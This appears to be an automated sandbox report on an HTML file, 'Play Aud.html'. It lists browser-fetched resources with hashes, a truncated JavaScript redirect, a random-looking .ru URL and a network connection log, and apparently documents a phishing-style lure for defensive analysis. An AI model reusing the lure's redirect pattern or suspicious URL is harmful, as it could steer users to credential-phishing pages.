                                                                                                    Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    URL:https://myarjsrdezglg80afwvjrshtwwtkbxelf5dkmyvn3nwlfsrfgzy4cl5qa.bfcgpixdwnw.ru/nejzxkuqjpqdsbwvvlPGTTotglnBJTRZLTDTUZEXJFIBYNSYMQMZBTQ
                                                                                                    Preview:1
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):89501
                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                    Malicious:false
                                                                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 20 x 87, 8-bit/color RGB, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):4.068159130770307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlbImElKkxl/k4E08up:6v/lhPymElKk7Tp
                                                                                                    MD5:3AB4ECC791132F3771EB2ACBF94AD05F
                                                                                                    SHA1:55CFABB9E41B767167EA91E1579764E19B90EE7A
                                                                                                    SHA-256:4098F6B28BBCA5F11CC51CA23E1DEA856D59B56D451B699ACE1C12716D1AEBFB
                                                                                                    SHA-512:1A834737BA08B9D85E249865AC3A4A4F0585074A6AF6D67F091DFB6FEABCF361FF3D9E7E5402E6D059B557691240C4A2BBF2EBBED61E31AE3AF97447DF5AD79D
                                                                                                    Malicious:false
                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f6a50df68a942a0/1734977510144/_mu_FeaXm0hvl7g
                                                                                                    Preview:.PNG........IHDR.......W......'.....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):48316
                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                    Malicious:false
                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):48316
                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                    Malicious:false
                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                    Malicious:false
                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):89501
                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                    Malicious:false
                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 20 x 87, 8-bit/color RGB, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61
                                                                                                    Entropy (8bit):4.068159130770307
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlbImElKkxl/k4E08up:6v/lhPymElKk7Tp
                                                                                                    MD5:3AB4ECC791132F3771EB2ACBF94AD05F
                                                                                                    SHA1:55CFABB9E41B767167EA91E1579764E19B90EE7A
                                                                                                    SHA-256:4098F6B28BBCA5F11CC51CA23E1DEA856D59B56D451B699ACE1C12716D1AEBFB
                                                                                                    SHA-512:1A834737BA08B9D85E249865AC3A4A4F0585074A6AF6D67F091DFB6FEABCF361FF3D9E7E5402E6D059B557691240C4A2BBF2EBBED61E31AE3AF97447DF5AD79D
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.......W......'.....IDAT.....$.....IEND.B`.
                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    File type:HTML document, ASCII text, with CRLF line terminators
                                                                                                    Entropy (8bit):5.122248540961878
                                                                                                    TrID:
                                                                                                    • HyperText Markup Language (12001/1) 40.67%
                                                                                                    • HyperText Markup Language (11501/1) 38.98%
                                                                                                    • HyperText Markup Language (6006/1) 20.35%
                                                                                                    File name:Play Aud.html
                                                                                                    File size:364 bytes
                                                                                                    MD5:2bb8b080bc5c05e7491f66c357b14c3c
                                                                                                    SHA1:0d57678e477647e987088df6c9dafcb547fcf277
                                                                                                    SHA256:b2fe7e7ba08e853e179077e9da9df90ef72fc4db3d22869ee60aabdeaf32e8b5
                                                                                                    SHA512:c1d1208e957ec4a5a9ea6a6bc0ec126042562837c434d3d6e075e5fd7ce609ef8a8dcd9d83cd48f951412e3e8618f749cd1920c800bd5b0270eac4155b86937d
                                                                                                    SSDEEP:6:q43t48a9DGgwF9dQBOMpClLffT7JN0MFpROUfrzaDSKrkvJNkQfGb:TqlDC5UELHT7JNLFHOUfrESWkBNk8Gb
                                                                                                    TLSH:D8E068FE1CEC8F36087302BCC8F27C29A9633400D554C96E44CE997B225302CC083C85
                                                                                                    File Content Preview:<html>..<head>..<title>Invidunt lorem justo sanctus clita. Erat lorem labore ea, justo dolor lorem ipsum ut sed eos, ipsum et dolor kasd sit ea justo. Erat justo sed sed diam.</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location =
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 23, 2024 19:11:29.795663118 CET49675443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:29.798572063 CET49674443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:29.892329931 CET49673443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:35.997477055 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.997528076 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.997683048 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.998346090 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.998397112 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.998579025 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.999223948 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.999238014 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:35.999792099 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:35.999804974 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.219809055 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.220020056 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.220053911 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.221860886 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.221925974 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.222681046 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.222718000 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.222784996 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.222850084 CET44349710172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.222909927 CET49710443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.223156929 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.223257065 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.223346949 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.223537922 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.223573923 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.224073887 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.224248886 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.224272013 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.225961924 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.226031065 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.226747990 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.226763010 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.226793051 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.226830959 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.227056980 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.227065086 CET44349711172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.227077007 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.227109909 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:37.227125883 CET49711443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.227163076 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.227307081 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:37.227346897 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.441766977 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.442018986 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.442044020 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.442682981 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.442862034 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.442886114 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.443257093 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.443322897 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.444343090 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.444410086 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.444447994 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.444528103 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.444875002 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.444974899 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.445009947 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.445018053 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.495542049 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.495553970 CET44349713172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:38.495553970 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:38.542412996 CET49713443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.398497105 CET49675443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:39.398509026 CET49674443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:39.505655050 CET49673443192.168.2.523.1.237.91
                                                                                                    Dec 23, 2024 19:11:39.527770042 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.527838945 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.527858973 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.527874947 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.527936935 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.527976990 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.528011084 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.528033018 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.528057098 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.528079987 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.528111935 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.528120995 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.528153896 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.575726986 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.575758934 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.623547077 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.647610903 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.651774883 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.652256012 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.652268887 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.660159111 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.660243034 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.660262108 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.668647051 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.668704987 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.668714046 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.668737888 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.668798923 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.669112921 CET49712443192.168.2.5172.67.143.137
                                                                                                    Dec 23, 2024 19:11:39.669130087 CET44349712172.67.143.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.805917025 CET49715443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:11:39.805947065 CET44349715142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.809144020 CET49715443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:11:39.809417009 CET49715443192.168.2.5142.250.181.68
                                                                                                    Dec 23, 2024 19:11:39.809428930 CET44349715142.250.181.68192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.813945055 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:39.813968897 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.814084053 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:39.814269066 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:39.814280987 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.815262079 CET49717443192.168.2.5104.18.95.41
                                                                                                    Dec 23, 2024 19:11:39.815363884 CET44349717104.18.95.41192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.815438986 CET49717443192.168.2.5104.18.95.41
                                                                                                    Dec 23, 2024 19:11:39.815598965 CET49717443192.168.2.5104.18.95.41
                                                                                                    Dec 23, 2024 19:11:39.815649033 CET44349717104.18.95.41192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.817379951 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:39.817498922 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:39.817573071 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:39.817775965 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:39.817815065 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.030673027 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.031650066 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.036463976 CET44349717104.18.95.41192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.084517956 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:41.084867954 CET49717443192.168.2.5104.18.95.41
                                                                                                    Dec 23, 2024 19:11:41.084873915 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:41.195542097 CET49717443192.168.2.5104.18.95.41
                                                                                                    Dec 23, 2024 19:11:41.195569992 CET44349717104.18.95.41192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.195903063 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:41.195925951 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.196042061 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:41.196052074 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.196979046 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.196991920 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.197004080 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.197015047 CET44349716151.101.66.137192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.197060108 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:41.197155952 CET49716443192.168.2.5151.101.66.137
                                                                                                    Dec 23, 2024 19:11:41.198604107 CET49718443192.168.2.5104.17.25.14
                                                                                                    Dec 23, 2024 19:11:41.198673964 CET44349718104.17.25.14192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.199410915 CET44349717104.18.95.41192.168.2.5
                                                                                                    Dec 23, 2024 19:11:41.199490070 CET49717443192.168.2.5104.18.95.41
